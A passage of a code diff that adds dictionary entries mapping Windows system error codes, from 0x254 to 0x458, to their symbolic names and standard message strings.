+ 0x00000254: ("ERROR_LOST_WRITEBEHIND_DATA", "{Delayed Write Failed}"),
+ 0x00000255: ("ERROR_CLIENT_SERVER_PARAMETERS_INVALID", "The parameter(s) passed to the server in the client/server shared memory window were invalid. Too much data may have been put in the shared memory window."),
+ 0x00000256: ("ERROR_NOT_TINY_STREAM", "The stream is not a tiny stream."),
+ 0x00000257: ("ERROR_STACK_OVERFLOW_READ", "The request must be handled by the stack overflow code."),
+ 0x00000258: ("ERROR_CONVERT_TO_LARGE", "Internal OFS status codes indicating how an allocation operation is handled. Either it is retried after the containing onode is moved or the extent stream is converted to a large stream."),
+ 0x00000259: ("ERROR_FOUND_OUT_OF_SCOPE", "The attempt to find the object found an object matching by ID on the volume but it is out of the scope of the handle used for the operation."),
+ 0x0000025a: ("ERROR_ALLOCATE_BUCKET", "The bucket array must be grown. Retry transaction after doing so."),
+ 0x0000025b: ("ERROR_MARSHALL_OVERFLOW", "The user/kernel marshalling buffer has overflowed."),
+ 0x0000025c: ("ERROR_INVALID_VARIANT", "The supplied variant structure contains invalid data."),
+ 0x0000025d: ("ERROR_BAD_COMPRESSION_BUFFER", "The specified buffer contains ill-formed data."),
+ 0x0000025e: ("ERROR_AUDIT_FAILED", "{Audit Failed}"),
+ 0x0000025f: ("ERROR_TIMER_RESOLUTION_NOT_SET", "The timer resolution was not previously set by the current process."),
+ 0x00000260: ("ERROR_INSUFFICIENT_LOGON_INFO", "There is insufficient account information to log you on."),
+ 0x00000261: ("ERROR_BAD_DLL_ENTRYPOINT", "{Invalid DLL Entrypoint}"),
+ 0x00000262: ("ERROR_BAD_SERVICE_ENTRYPOINT", "{Invalid Service Callback Entrypoint}"),
+ 0x00000263: ("ERROR_IP_ADDRESS_CONFLICT1", "There is an IP address conflict with another system on the network"),
+ 0x00000264: ("ERROR_IP_ADDRESS_CONFLICT2", "There is an IP address conflict with another system on the network"),
+ 0x00000265: ("ERROR_REGISTRY_QUOTA_LIMIT", "{Low On Registry Space}"),
+ 0x00000266: ("ERROR_NO_CALLBACK_ACTIVE", "A callback return system service cannot be executed when no callback is active."),
+ 0x00000267: ("ERROR_PWD_TOO_SHORT", "The password provided is too short to meet the policy of your user account."),
+ 0x00000268: ("ERROR_PWD_TOO_RECENT", "The policy of your user account does not allow you to change passwords too frequently."),
+ 0x00000269: ("ERROR_PWD_HISTORY_CONFLICT", "You have attempted to change your password to one that you have used in the past."),
+ 0x0000026a: ("ERROR_UNSUPPORTED_COMPRESSION", "The specified compression format is unsupported."),
+ 0x0000026b: ("ERROR_INVALID_HW_PROFILE", "The specified hardware profile configuration is invalid."),
+ 0x0000026c: ("ERROR_INVALID_PLUGPLAY_DEVICE_PATH", "The specified Plug and Play registry device path is invalid."),
+ 0x0000026d: ("ERROR_QUOTA_LIST_INCONSISTENT", "The specified quota list is internally inconsistent with its descriptor."),
+ 0x0000026e: ("ERROR_EVALUATION_EXPIRATION", "{Windows Evaluation Notification}"),
+ 0x0000026f: ("ERROR_ILLEGAL_DLL_RELOCATION", "{Illegal System DLL Relocation}"),
+ 0x00000270: ("ERROR_DLL_INIT_FAILED_LOGOFF", "{DLL Initialization Failed}"),
+ 0x00000271: ("ERROR_VALIDATE_CONTINUE", "The validation process needs to continue on to the next step."),
+ 0x00000272: ("ERROR_NO_MORE_MATCHES", "There are no more matches for the current index enumeration."),
+ 0x00000273: ("ERROR_RANGE_LIST_CONFLICT", "The range could not be added to the range list because of a conflict."),
+ 0x00000274: ("ERROR_SERVER_SID_MISMATCH", "The server process is running under a SID different than that required by client."),
+ 0x00000275: ("ERROR_CANT_ENABLE_DENY_ONLY", "A group marked use for deny only cannot be enabled."),
+ 0x00000276: ("ERROR_FLOAT_MULTIPLE_FAULTS", "{EXCEPTION}"),
+ 0x00000277: ("ERROR_FLOAT_MULTIPLE_TRAPS", "{EXCEPTION}"),
+ 0x00000278: ("ERROR_NOINTERFACE", "The requested interface is not supported."),
+ 0x00000279: ("ERROR_DRIVER_FAILED_SLEEP", "{System Standby Failed}"),
+ 0x0000027a: ("ERROR_CORRUPT_SYSTEM_FILE", "The system file %1 has become corrupt and has been replaced."),
+ 0x0000027b: ("ERROR_COMMITMENT_MINIMUM", "{Virtual Memory Minimum Too Low}"),
+ 0x0000027c: ("ERROR_PNP_RESTART_ENUMERATION", "A device was removed so enumeration must be restarted."),
+ 0x0000027d: ("ERROR_SYSTEM_IMAGE_BAD_SIGNATURE", "{Fatal System Error}"),
+ 0x0000027e: ("ERROR_PNP_REBOOT_REQUIRED", "Device will not start without a reboot."),
+ 0x0000027f: ("ERROR_INSUFFICIENT_POWER", "There is not enough power to complete the requested operation."),
+ 0x00000280: ("ERROR_MULTIPLE_FAULT_VIOLATION", " ERROR_MULTIPLE_FAULT_VIOLATION"),
+ 0x00000281: ("ERROR_SYSTEM_SHUTDOWN", "The system is in the process of shutting down."),
+ 0x00000282: ("ERROR_PORT_NOT_SET", "An attempt to remove a processes DebugPort was made, but a port was not already associated with the process."),
+ 0x00000283: ("ERROR_DS_VERSION_CHECK_FAILURE", "This version of Windows is not compatible with the behavior version of directory forest, domain or domain controller."),
+ 0x00000284: ("ERROR_RANGE_NOT_FOUND", "The specified range could not be found in the range list."),
+ 0x00000286: ("ERROR_NOT_SAFE_MODE_DRIVER", "The driver was not loaded because the system is booting into safe mode."),
+ 0x00000287: ("ERROR_FAILED_DRIVER_ENTRY", "The driver was not loaded because it failed its initialization call."),
+ 0x00000288: ("ERROR_DEVICE_ENUMERATION_ERROR", "The '%hs' encountered an error while applying power or reading the device configuration."),
+ 0x00000289: ("ERROR_MOUNT_POINT_NOT_RESOLVED", "The create operation failed because the name contained at least one mount point which resolves to a volume to which the specified device object is not attached."),
+ 0x0000028a: ("ERROR_INVALID_DEVICE_OBJECT_PARAMETER", "The device object parameter is either not a valid device object or is not attached to the volume specified by the file name."),
+ 0x0000028b: ("ERROR_MCA_OCCURED", "A Machine Check Error has occurred. Please check the system eventlog for additional information."),
+ 0x0000028c: ("ERROR_DRIVER_DATABASE_ERROR", "There was error [%2] processing the driver database."),
+ 0x0000028d: ("ERROR_SYSTEM_HIVE_TOO_LARGE", "System hive size has exceeded its limit."),
+ 0x0000028e: ("ERROR_DRIVER_FAILED_PRIOR_UNLOAD", "The driver could not be loaded because a previous version of the driver is still in memory."),
+ 0x0000028f: ("ERROR_VOLSNAP_PREPARE_HIBERNATE", "{Volume Shadow Copy Service}"),
+ 0x00000290: ("ERROR_HIBERNATION_FAILURE", "The system has failed to hibernate (The error code is %hs). Hibernation will be disabled until the system is restarted."),
+ 0x00000291: ("ERROR_PWD_TOO_LONG", "The password provided is too long to meet the policy of your user account."),
+ 0x00000299: ("ERROR_FILE_SYSTEM_LIMITATION", "The requested operation could not be completed due to a file system limitation"),
+ 0x0000029c: ("ERROR_ASSERTION_FAILURE", "An assertion failure has occurred."),
+ 0x0000029d: ("ERROR_ACPI_ERROR", "An error occurred in the ACPI subsystem."),
+ 0x0000029e: ("ERROR_WOW_ASSERTION", "WOW Assertion Error."),
+ 0x0000029f: ("ERROR_PNP_BAD_MPS_TABLE", "A device is missing in the system BIOS MPS table. This device will not be used."),
+ 0x000002a0: ("ERROR_PNP_TRANSLATION_FAILED", "A translator failed to translate resources."),
+ 0x000002a1: ("ERROR_PNP_IRQ_TRANSLATION_FAILED", "A IRQ translator failed to translate resources."),
+ 0x000002a2: ("ERROR_PNP_INVALID_ID", "Driver %2 returned invalid ID for a child device (%3)."),
+ 0x000002a3: ("ERROR_WAKE_SYSTEM_DEBUGGER", "{Kernel Debugger Awakened}"),
+ 0x000002a4: ("ERROR_HANDLES_CLOSED", "{Handles Closed}"),
+ 0x000002a5: ("ERROR_EXTRANEOUS_INFORMATION", "{Too Much Information}"),
+ 0x000002a6: ("ERROR_RXACT_COMMIT_NECESSARY", "This warning level status indicates that the transaction state already exists for the registry sub-tree, but that a transaction commit was previously aborted."),
+ 0x000002a7: ("ERROR_MEDIA_CHECK", "{Media Changed}"),
+ 0x000002a8: ("ERROR_GUID_SUBSTITUTION_MADE", "{GUID Substitution}"),
+ 0x000002a9: ("ERROR_STOPPED_ON_SYMLINK", "The create operation stopped after reaching a symbolic link"),
+ 0x000002aa: ("ERROR_LONGJUMP", "A long jump has been executed."),
+ 0x000002ab: ("ERROR_PLUGPLAY_QUERY_VETOED", "The Plug and Play query operation was not successful."),
+ 0x000002ac: ("ERROR_UNWIND_CONSOLIDATE", "A frame consolidation has been executed."),
+ 0x000002ad: ("ERROR_REGISTRY_HIVE_RECOVERED", "{Registry Hive Recovered}"),
+ 0x000002ae: ("ERROR_DLL_MIGHT_BE_INSECURE", "The application is attempting to run executable code from the module %hs. This may be insecure. An alternative, %hs, is available. Should the application use the secure module %hs?"),
+ 0x000002af: ("ERROR_DLL_MIGHT_BE_INCOMPATIBLE", "The application is loading executable code from the module %hs. This is secure, but may be incompatible with previous releases of the operating system. An alternative, %hs, is available. Should the application use the secure module %hs?"),
+ 0x000002b0: ("ERROR_DBG_EXCEPTION_NOT_HANDLED", "Debugger did not handle the exception."),
+ 0x000002b1: ("ERROR_DBG_REPLY_LATER", "Debugger will reply later."),
+ 0x000002b2: ("ERROR_DBG_UNABLE_TO_PROVIDE_HANDLE", "Debugger cannot provide handle."),
+ 0x000002b3: ("ERROR_DBG_TERMINATE_THREAD", "Debugger terminated thread."),
+ 0x000002b4: ("ERROR_DBG_TERMINATE_PROCESS", "Debugger terminated process."),
+ 0x000002b5: ("ERROR_DBG_CONTROL_C", "Debugger got control C."),
+ 0x000002b6: ("ERROR_DBG_PRINTEXCEPTION_C", "Debugger printed exception on control C."),
+ 0x000002b7: ("ERROR_DBG_RIPEXCEPTION", "Debugger received RIP exception."),
+ 0x000002b8: ("ERROR_DBG_CONTROL_BREAK", "Debugger received control break."),
+ 0x000002b9: ("ERROR_DBG_COMMAND_EXCEPTION", "Debugger command communication exception."),
+ 0x000002ba: ("ERROR_OBJECT_NAME_EXISTS", "{Object Exists}"),
+ 0x000002bb: ("ERROR_THREAD_WAS_SUSPENDED", "{Thread Suspended}"),
+ 0x000002bc: ("ERROR_IMAGE_NOT_AT_BASE", "{Image Relocated}"),
+ 0x000002bd: ("ERROR_RXACT_STATE_CREATED", "This informational level status indicates that a specified registry sub-tree transaction state did not yet exist and had to be created."),
+ 0x000002be: ("ERROR_SEGMENT_NOTIFICATION", "{Segment Load}"),
+ 0x000002bf: ("ERROR_BAD_CURRENT_DIRECTORY", "{Invalid Current Directory}"),
+ 0x000002c0: ("ERROR_FT_READ_RECOVERY_FROM_BACKUP", "{Redundant Read}"),
+ 0x000002c1: ("ERROR_FT_WRITE_RECOVERY", "{Redundant Write}"),
+ 0x000002c2: ("ERROR_IMAGE_MACHINE_TYPE_MISMATCH", "{Machine Type Mismatch}"),
+ 0x000002c3: ("ERROR_RECEIVE_PARTIAL", "{Partial Data Received}"),
+ 0x000002c4: ("ERROR_RECEIVE_EXPEDITED", "{Expedited Data Received}"),
+ 0x000002c5: ("ERROR_RECEIVE_PARTIAL_EXPEDITED", "{Partial Expedited Data Received}"),
+ 0x000002c6: ("ERROR_EVENT_DONE", "{TDI Event Done}"),
+ 0x000002c7: ("ERROR_EVENT_PENDING", "{TDI Event Pending}"),
+ 0x000002c8: ("ERROR_CHECKING_FILE_SYSTEM", "Checking file system on %wZ"),
+ 0x000002c9: ("ERROR_FATAL_APP_EXIT", "{Fatal Application Exit}"),
+ 0x000002ca: ("ERROR_PREDEFINED_HANDLE", "The specified registry key is referenced by a predefined handle."),
+ 0x000002cb: ("ERROR_WAS_UNLOCKED", "{Page Unlocked}"),
+ 0x000002cc: ("ERROR_SERVICE_NOTIFICATION", "%hs"),
+ 0x000002cd: ("ERROR_WAS_LOCKED", "{Page Locked}"),
+ 0x000002ce: ("ERROR_LOG_HARD_ERROR", "Application popup: %1 : %2"),
+ 0x000002cf: ("ERROR_ALREADY_WIN32", " ERROR_ALREADY_WIN32"),
+ 0x000002d0: ("ERROR_IMAGE_MACHINE_TYPE_MISMATCH_EXE", "{Machine Type Mismatch}"),
+ 0x000002d1: ("ERROR_NO_YIELD_PERFORMED", "A yield execution was performed and no thread was available to run."),
+ 0x000002d2: ("ERROR_TIMER_RESUME_IGNORED", "The resumable flag to a timer API was ignored."),
+ 0x000002d3: ("ERROR_ARBITRATION_UNHANDLED", "The arbiter has deferred arbitration of these resources to its parent"),
+ 0x000002d4: ("ERROR_CARDBUS_NOT_SUPPORTED", "The inserted CardBus device cannot be started because of a configuration error on '%hs'."),
+ 0x000002d5: ("ERROR_MP_PROCESSOR_MISMATCH", "The CPUs in this multiprocessor system are not all the same revision level. To use all processors the operating system restricts itself to the features of the least capable processor in the system. Should problems occur with this system, contact the CPU manufacturer to see if this mix of processors is supported."),
+ 0x000002d6: ("ERROR_HIBERNATED", "The system was put into hibernation."),
+ 0x000002d7: ("ERROR_RESUME_HIBERNATION", "The system was resumed from hibernation."),
+ 0x000002d8: ("ERROR_FIRMWARE_UPDATED", "Windows has detected that the system firmware (BIOS) was updated [previous firmware date = %2, current firmware date %3]."),
+ 0x000002d9: ("ERROR_DRIVERS_LEAKING_LOCKED_PAGES", "A device driver is leaking locked I/O pages causing system degradation. The system has automatically enabled tracking code in order to try and catch the culprit."),
+ 0x000002da: ("ERROR_WAKE_SYSTEM", "The system has awoken"),
+ 0x000002db: ("ERROR_WAIT_1", " ERROR_WAIT_1"),
+ 0x000002dc: ("ERROR_WAIT_2", " ERROR_WAIT_2"),
+ 0x000002dd: ("ERROR_WAIT_3", " ERROR_WAIT_3"),
+ 0x000002de: ("ERROR_WAIT_63", " ERROR_WAIT_63"),
+ 0x000002df: ("ERROR_ABANDONED_WAIT_0", " ERROR_ABANDONED_WAIT_0"),
+ 0x000002e0: ("ERROR_ABANDONED_WAIT_63", " ERROR_ABANDONED_WAIT_63"),
+ 0x000002e1: ("ERROR_USER_APC", " ERROR_USER_APC"),
+ 0x000002e2: ("ERROR_KERNEL_APC", " ERROR_KERNEL_APC"),
+ 0x000002e3: ("ERROR_ALERTED", " ERROR_ALERTED"),
+ 0x000002e4: ("ERROR_ELEVATION_REQUIRED", "The requested operation requires elevation."),
+ 0x000002e5: ("ERROR_REPARSE", "A reparse should be performed by the Object Manager since the name of the file resulted in a symbolic link."),
+ 0x000002e6: ("ERROR_OPLOCK_BREAK_IN_PROGRESS", "An open/create operation completed while an oplock break is underway."),
+ 0x000002e7: ("ERROR_VOLUME_MOUNTED", "A new volume has been mounted by a file system."),
+ 0x000002e8: ("ERROR_RXACT_COMMITTED", "This success level status indicates that the transaction state already exists for the registry sub-tree, but that a transaction commit was previously aborted."),
+ 0x000002e9: ("ERROR_NOTIFY_CLEANUP", "This indicates that a notify change request has been completed due to closing the handle which made the notify change request."),
+ 0x000002ea: ("ERROR_PRIMARY_TRANSPORT_CONNECT_FAILED", "{Connect Failure on Primary Transport}"),
+ 0x000002eb: ("ERROR_PAGE_FAULT_TRANSITION", "Page fault was a transition fault."),
+ 0x000002ec: ("ERROR_PAGE_FAULT_DEMAND_ZERO", "Page fault was a demand zero fault."),
+ 0x000002ed: ("ERROR_PAGE_FAULT_COPY_ON_WRITE", "Page fault was a demand zero fault."),
+ 0x000002ee: ("ERROR_PAGE_FAULT_GUARD_PAGE", "Page fault was a demand zero fault."),
+ 0x000002ef: ("ERROR_PAGE_FAULT_PAGING_FILE", "Page fault was satisfied by reading from a secondary storage device."),
+ 0x000002f0: ("ERROR_CACHE_PAGE_LOCKED", "Cached page was locked during operation."),
+ 0x000002f1: ("ERROR_CRASH_DUMP", "Crash dump exists in paging file."),
+ 0x000002f2: ("ERROR_BUFFER_ALL_ZEROS", "Specified buffer contains all zeros."),
+ 0x000002f3: ("ERROR_REPARSE_OBJECT", "A reparse should be performed by the Object Manager since the name of the file resulted in a symbolic link."),
+ 0x000002f4: ("ERROR_RESOURCE_REQUIREMENTS_CHANGED", "The device has succeeded a query-stop and its resource requirements have changed."),
+ 0x000002f5: ("ERROR_TRANSLATION_COMPLETE", "The translator has translated these resources into the global space and no further translations should be performed."),
+ 0x000002f6: ("ERROR_NOTHING_TO_TERMINATE", "A process being terminated has no threads to terminate."),
+ 0x000002f7: ("ERROR_PROCESS_NOT_IN_JOB", "The specified process is not part of a job."),
+ 0x000002f8: ("ERROR_PROCESS_IN_JOB", "The specified process is part of a job."),
+ 0x000002f9: ("ERROR_VOLSNAP_HIBERNATE_READY", "{Volume Shadow Copy Service}"),
+ 0x000002fa: ("ERROR_FSFILTER_OP_COMPLETED_SUCCESSFULLY", "A file system or file system filter driver has successfully completed an FsFilter operation."),
+ 0x000002fb: ("ERROR_INTERRUPT_VECTOR_ALREADY_CONNECTED", "The specified interrupt vector was already connected."),
+ 0x000002fc: ("ERROR_INTERRUPT_STILL_CONNECTED", "The specified interrupt vector is still connected."),
+ 0x000002fd: ("ERROR_WAIT_FOR_OPLOCK", "An operation is blocked waiting for an oplock."),
+ 0x000002fe: ("ERROR_DBG_EXCEPTION_HANDLED", "Debugger handled exception"),
+ 0x000002ff: ("ERROR_DBG_CONTINUE", "Debugger continued"),
+ 0x00000300: ("ERROR_CALLBACK_POP_STACK", "An exception occurred in a user mode callback and the kernel callback frame should be removed."),
+ 0x00000301: ("ERROR_COMPRESSION_DISABLED", "Compression is disabled for this volume."),
+ 0x00000302: ("ERROR_CANTFETCHBACKWARDS", "The data provider cannot fetch backwards through a result set."),
+ 0x00000303: ("ERROR_CANTSCROLLBACKWARDS", "The data provider cannot scroll backwards through a result set."),
+ 0x00000304: ("ERROR_ROWSNOTRELEASED", "The data provider requires that previously fetched data is released before asking for more data."),
+ 0x00000305: ("ERROR_BAD_ACCESSOR_FLAGS", "The data provider was not able to interpret the flags set for a column binding in an accessor."),
+ 0x00000306: ("ERROR_ERRORS_ENCOUNTERED", "One or more errors occurred while processing the request."),
+ 0x00000307: ("ERROR_NOT_CAPABLE", "The implementation is not capable of performing the request."),
+ 0x00000308: ("ERROR_REQUEST_OUT_OF_SEQUENCE", "The client of a component requested an operation which is not valid given the state of the component instance."),
+ 0x00000309: ("ERROR_VERSION_PARSE_ERROR", "A version number could not be parsed."),
+ 0x0000030a: ("ERROR_BADSTARTPOSITION", "The iterator's start position is invalid."),
+ 0x0000030b: ("ERROR_MEMORY_HARDWARE", "The hardware has reported an uncorrectable memory error."),
+ 0x0000030c: ("ERROR_DISK_REPAIR_DISABLED", "The attempted operation required self healing to be enabled."),
+ 0x0000030d: ("ERROR_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE", "The Desktop heap encountered an error while allocating session memory. There is more information in the system event log."),
+ 0x0000030e: ("ERROR_SYSTEM_POWERSTATE_TRANSITION", "The system power state is transitioning from %2 to %3."),
+ 0x0000030f: ("ERROR_SYSTEM_POWERSTATE_COMPLEX_TRANSITION", "The system power state is transitioning from %2 to %3 but could enter %4."),
+ 0x00000310: ("ERROR_MCA_EXCEPTION", "A thread is getting dispatched with MCA EXCEPTION because of MCA."),
+ 0x00000311: ("ERROR_ACCESS_AUDIT_BY_POLICY", "Access to %1 is monitored by policy rule %2."),
+ 0x00000312: ("ERROR_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY", "Access to %1 has been restricted by your Administrator by policy rule %2."),
+ 0x00000313: ("ERROR_ABANDON_HIBERFILE", "A valid hibernation file has been invalidated and should be abandoned."),
+ 0x00000314: ("ERROR_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED", "{Delayed Write Failed}"),
+ 0x00000315: ("ERROR_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR", "{Delayed Write Failed}"),
+ 0x00000316: ("ERROR_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR", "{Delayed Write Failed}"),
+ 0x00000317: ("ERROR_BAD_MCFG_TABLE", "The resources required for this device conflict with the MCFG table."),
+ 0x00000318: ("ERROR_DISK_REPAIR_REDIRECTED", "The volume repair could not be performed while it is online."),
+ 0x00000319: ("ERROR_DISK_REPAIR_UNSUCCESSFUL", "The volume repair was not successful."),
+ 0x0000031a: ("ERROR_CORRUPT_LOG_OVERFULL", "One of the volume corruption logs is full. Further corruptions that may be detected won't be logged."),
+ 0x0000031b: ("ERROR_CORRUPT_LOG_CORRUPTED", "One of the volume corruption logs is internally corrupted and needs to be recreated. The volume may contain undetected corruptions and must be scanned."),
+ 0x0000031c: ("ERROR_CORRUPT_LOG_UNAVAILABLE", "One of the volume corruption logs is unavailable for being operated on."),
+ 0x0000031d: ("ERROR_CORRUPT_LOG_DELETED_FULL", "One of the volume corruption logs was deleted while still having corruption records in them. The volume contains detected corruptions and must be scanned."),
+ 0x0000031e: ("ERROR_CORRUPT_LOG_CLEARED", "One of the volume corruption logs was cleared by chkdsk and no longer contains real corruptions."),
+ 0x0000031f: ("ERROR_ORPHAN_NAME_EXHAUSTED", "Orphaned files exist on the volume but could not be recovered because no more new names could be created in the recovery directory. Files must be moved from the recovery directory."),
+ 0x00000320: ("ERROR_OPLOCK_SWITCHED_TO_NEW_HANDLE", "The oplock that was associated with this handle is now associated with a different handle."),
+ 0x00000321: ("ERROR_CANNOT_GRANT_REQUESTED_OPLOCK", "An oplock of the requested level cannot be granted. An oplock of a lower level may be available."),
+ 0x00000322: ("ERROR_CANNOT_BREAK_OPLOCK", "The operation did not complete successfully because it would cause an oplock to be broken. The caller has requested that existing oplocks not be broken."),
+ 0x00000323: ("ERROR_OPLOCK_HANDLE_CLOSED", "The handle with which this oplock was associated has been closed. The oplock is now broken."),
+ 0x00000324: ("ERROR_NO_ACE_CONDITION", "The specified access control entry (ACE) does not contain a condition."),
+ 0x00000325: ("ERROR_INVALID_ACE_CONDITION", "The specified access control entry (ACE) contains an invalid condition."),
+ 0x00000326: ("ERROR_FILE_HANDLE_REVOKED", "Access to the specified file handle has been revoked."),
+ 0x00000327: ("ERROR_IMAGE_AT_DIFFERENT_BASE", "{Image Relocated}"),
+ 0x000003e2: ("ERROR_EA_ACCESS_DENIED", "Access to the extended attribute was denied."),
+ 0x000003e3: ("ERROR_OPERATION_ABORTED", "The I/O operation has been aborted because of either a thread exit or an application request."),
+ 0x000003e4: ("ERROR_IO_INCOMPLETE", "Overlapped I/O event is not in a signaled state."),
+ 0x000003e5: ("ERROR_IO_PENDING", "Overlapped I/O operation is in progress."),
+ 0x000003e6: ("ERROR_NOACCESS", "Invalid access to memory location."),
+ 0x000003e7: ("ERROR_SWAPERROR", "Error performing inpage operation."),
+ 0x000003e9: ("ERROR_STACK_OVERFLOW", "Recursion too deep; the stack overflowed."),
+ 0x000003ea: ("ERROR_INVALID_MESSAGE", "The window cannot act on the sent message."),
+ 0x000003eb: ("ERROR_CAN_NOT_COMPLETE", "Cannot complete this function."),
+ 0x000003ec: ("ERROR_INVALID_FLAGS", "Invalid flags."),
+ 0x000003ed: ("ERROR_UNRECOGNIZED_VOLUME", "The volume does not contain a recognized file system."),
+ 0x000003ee: ("ERROR_FILE_INVALID", "The volume for a file has been externally altered so that the opened file is no longer valid."),
+ 0x000003ef: ("ERROR_FULLSCREEN_MODE", "The requested operation cannot be performed in full-screen mode."),
+ 0x000003f0: ("ERROR_NO_TOKEN", "An attempt was made to reference a token that does not exist."),
+ 0x000003f1: ("ERROR_BADDB", "The configuration registry database is corrupt."),
+ 0x000003f2: ("ERROR_BADKEY", "The configuration registry key is invalid."),
+ 0x000003f3: ("ERROR_CANTOPEN", "The configuration registry key could not be opened."),
+ 0x000003f4: ("ERROR_CANTREAD", "The configuration registry key could not be read."),
+ 0x000003f5: ("ERROR_CANTWRITE", "The configuration registry key could not be written."),
+ 0x000003f6: ("ERROR_REGISTRY_RECOVERED", "One of the files in the registry database had to be recovered by use of a log or alternate copy. The recovery was successful."),
+ 0x000003f7: ("ERROR_REGISTRY_CORRUPT", "The registry is corrupted. The structure of one of the files containing registry data is corrupted, or the system's memory image of the file is corrupted, or the file could not be recovered because the alternate copy or log was absent or corrupted."),
+ 0x000003f8: ("ERROR_REGISTRY_IO_FAILED", "An I/O operation initiated by the registry failed unrecoverably. The registry could not read in, or write out, or flush, one of the files that contain the system's image of the registry."),
+ 0x000003f9: ("ERROR_NOT_REGISTRY_FILE", "The system has attempted to load or restore a file into the registry, but the specified file is not in a registry file format."),
+ 0x000003fa: ("ERROR_KEY_DELETED", "Illegal operation attempted on a registry key that has been marked for deletion."),
+ 0x000003fb: ("ERROR_NO_LOG_SPACE", "System could not allocate the required space in a registry log."),
+ 0x000003fc: ("ERROR_KEY_HAS_CHILDREN", "Cannot create a symbolic link in a registry key that already has subkeys or values."),
+ 0x000003fd: ("ERROR_CHILD_MUST_BE_VOLATILE", "Cannot create a stable subkey under a volatile parent key."),
+ 0x000003fe: ("ERROR_NOTIFY_ENUM_DIR", "A notify change request is being completed and the information is not being returned in the caller's buffer. The caller now needs to enumerate the files to find the changes."),
+ 0x0000041b: ("ERROR_DEPENDENT_SERVICES_RUNNING", "A stop control has been sent to a service that other running services are dependent on."),
+ 0x0000041c: ("ERROR_INVALID_SERVICE_CONTROL", "The requested control is not valid for this service."),
+ 0x0000041d: ("ERROR_SERVICE_REQUEST_TIMEOUT", "The service did not respond to the start or control request in a timely fashion."),
+ 0x0000041e: ("ERROR_SERVICE_NO_THREAD", "A thread could not be created for the service."),
+ 0x0000041f: ("ERROR_SERVICE_DATABASE_LOCKED", "The service database is locked."),
+ 0x00000420: ("ERROR_SERVICE_ALREADY_RUNNING", "An instance of the service is already running."),
+ 0x00000421: ("ERROR_INVALID_SERVICE_ACCOUNT", "The account name is invalid or does not exist, or the password is invalid for the account name specified."),
+ 0x00000422: ("ERROR_SERVICE_DISABLED", "The service cannot be started, either because it is disabled or because it has no enabled devices associated with it."),
+ 0x00000423: ("ERROR_CIRCULAR_DEPENDENCY", "Circular service dependency was specified."),
+ 0x00000424: ("ERROR_SERVICE_DOES_NOT_EXIST", "The specified service does not exist as an installed service."),
+ 0x00000425: ("ERROR_SERVICE_CANNOT_ACCEPT_CTRL", "The service cannot accept control messages at this time."),
+ 0x00000426: ("ERROR_SERVICE_NOT_ACTIVE", "The service has not been started."),
+ 0x00000427: ("ERROR_FAILED_SERVICE_CONTROLLER_CONNECT", "The service process could not connect to the service controller."),
+ 0x00000428: ("ERROR_EXCEPTION_IN_SERVICE", "An exception occurred in the service when handling the control request."),
+ 0x00000429: ("ERROR_DATABASE_DOES_NOT_EXIST", "The database specified does not exist."),
+ 0x0000042a: ("ERROR_SERVICE_SPECIFIC_ERROR", "The service has returned a service-specific error code."),
+ 0x0000042b: ("ERROR_PROCESS_ABORTED", "The process terminated unexpectedly."),
+ 0x0000042c: ("ERROR_SERVICE_DEPENDENCY_FAIL", "The dependency service or group failed to start."),
+ 0x0000042d: ("ERROR_SERVICE_LOGON_FAILED", "The service did not start due to a logon failure."),
+ 0x0000042e: ("ERROR_SERVICE_START_HANG", "After starting, the service hung in a start-pending state."),
+ 0x0000042f: ("ERROR_INVALID_SERVICE_LOCK", "The specified service database lock is invalid."),
+ 0x00000430: ("ERROR_SERVICE_MARKED_FOR_DELETE", "The specified service has been marked for deletion."),
+ 0x00000431: ("ERROR_SERVICE_EXISTS", "The specified service already exists."),
+ 0x00000432: ("ERROR_ALREADY_RUNNING_LKG", "The system is currently running with the last-known-good configuration."),
+ 0x00000433: ("ERROR_SERVICE_DEPENDENCY_DELETED", "The dependency service does not exist or has been marked for deletion."),
+ 0x00000434: ("ERROR_BOOT_ALREADY_ACCEPTED", "The current boot has already been accepted for use as the last-known-good control set."),
+ 0x00000435: ("ERROR_SERVICE_NEVER_STARTED", "No attempts to start the service have been made since the last boot."),
+ 0x00000436: ("ERROR_DUPLICATE_SERVICE_NAME", "The name is already in use as either a service name or a service display name."),
+ 0x00000437: ("ERROR_DIFFERENT_SERVICE_ACCOUNT", "The account specified for this service is different from the account specified for other services running in the same process."),
+ 0x00000438: ("ERROR_CANNOT_DETECT_DRIVER_FAILURE", "Failure actions can only be set for Win32 services, not for drivers."),
+ 0x00000439: ("ERROR_CANNOT_DETECT_PROCESS_ABORT", "This service runs in the same process as the service control manager."),
+ 0x0000043a: ("ERROR_NO_RECOVERY_PROGRAM", "No recovery program has been configured for this service."),
+ 0x0000043b: ("ERROR_SERVICE_NOT_IN_EXE", "The executable program that this service is configured to run in does not implement the service."),
+ 0x0000043c: ("ERROR_NOT_SAFEBOOT_SERVICE", "This service cannot be started in Safe Mode"),
+ 0x0000044c: ("ERROR_END_OF_MEDIA", "The physical end of the tape has been reached."),
+ 0x0000044d: ("ERROR_FILEMARK_DETECTED", "A tape access reached a filemark."),
+ 0x0000044e: ("ERROR_BEGINNING_OF_MEDIA", "The beginning of the tape or a partition was encountered."),
+ 0x0000044f: ("ERROR_SETMARK_DETECTED", "A tape access reached the end of a set of files."),
+ 0x00000450: ("ERROR_NO_DATA_DETECTED", "No more data is on the tape."),
+ 0x00000451: ("ERROR_PARTITION_FAILURE", "Tape could not be partitioned."),
+ 0x00000452: ("ERROR_INVALID_BLOCK_LENGTH", "When accessing a new tape of a multivolume partition, the current block size is incorrect."),
+ 0x00000453: ("ERROR_DEVICE_NOT_PARTITIONED", "Tape partition information could not be found when loading a tape."),
+ 0x00000454: ("ERROR_UNABLE_TO_LOCK_MEDIA", "Unable to lock the media eject mechanism."),
+ 0x00000455: ("ERROR_UNABLE_TO_UNLOAD_MEDIA", "Unable to unload the media."),
+ 0x00000456: ("ERROR_MEDIA_CHANGED", "The media in the drive may have changed."),
+ 0x00000457: ("ERROR_BUS_RESET", "The I/O bus was reset."),
+ 0x00000458: ("ERROR_NO_MEDIA_IN_DRIVE", "No media in drive."),
